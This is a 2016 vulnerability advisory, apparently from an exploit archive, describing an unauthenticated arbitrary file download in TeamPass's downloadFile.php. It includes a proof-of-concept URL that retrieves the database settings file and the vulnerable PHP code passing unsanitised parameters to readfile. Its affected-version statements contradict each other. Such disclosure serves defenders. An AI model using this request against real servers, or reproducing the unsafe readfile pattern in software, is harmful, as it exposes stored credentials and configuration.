TeamPass Passwords Management System 2.1.26 File Download
Posted on 23 July 2016
1. ADVISORY INFORMATION ======================================== Title: TeamPass Passwords Management System via Unauth File Download and Arbitrary File Download Application: TeamPass Passwords Management System Class: Sensitive Information disclosure Remotely Exploitable: Yes Versions Affected: TeamPass Passwords Management System <= 2.1.26 Bugs: Arbitrary File Download Date of found: 21.03.2016 Reported: 09.05.2016 Date of Public Advisory: 13.05.2016 Author: Hasan Emre Ozer 2. CREDIT ======================================== This vulnerability was identified during penetration test by Hasan Emre Ozer & Halit Alptekin from PRODAFT / INVICTUS Thank you Mehmet Ince for support 3. DESCRIPTION ======================================== We deciced to publish the vulnerability after its fix in release 2.1.26 4. VERSIONS AFFECTED ======================================== TeamPass Passwords Management System <= 2.1.10 5. TECHNICAL DETAILS & POC ======================================== Using 'downloadFile.php' file from 'sources' directory we can download any file. Proof of Concept (POC) Example for downloading database configuration: http://teampass/sources/downloadFile.php?sub=includes&file=settings.php Technical Details <?php ...... header("Content-disposition: attachment; filename=".rawurldecode($_GET['name'])); header("Content-Type: application/octet-stream"); header("Pragma: public"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0, public"); header("Expires: 0"); readfile('../'.$_GET['sub'].'/'.basename($_GET['file'])); ?> $_GET['sub'] and $_GET['file'] parameters vulnerable in readfile function. 6. SOLUTION ======================================== Update to the latest version v2.1.26 7. REFERENCES ======================================== http://teampass.net/2016-05-13-release-2.1.26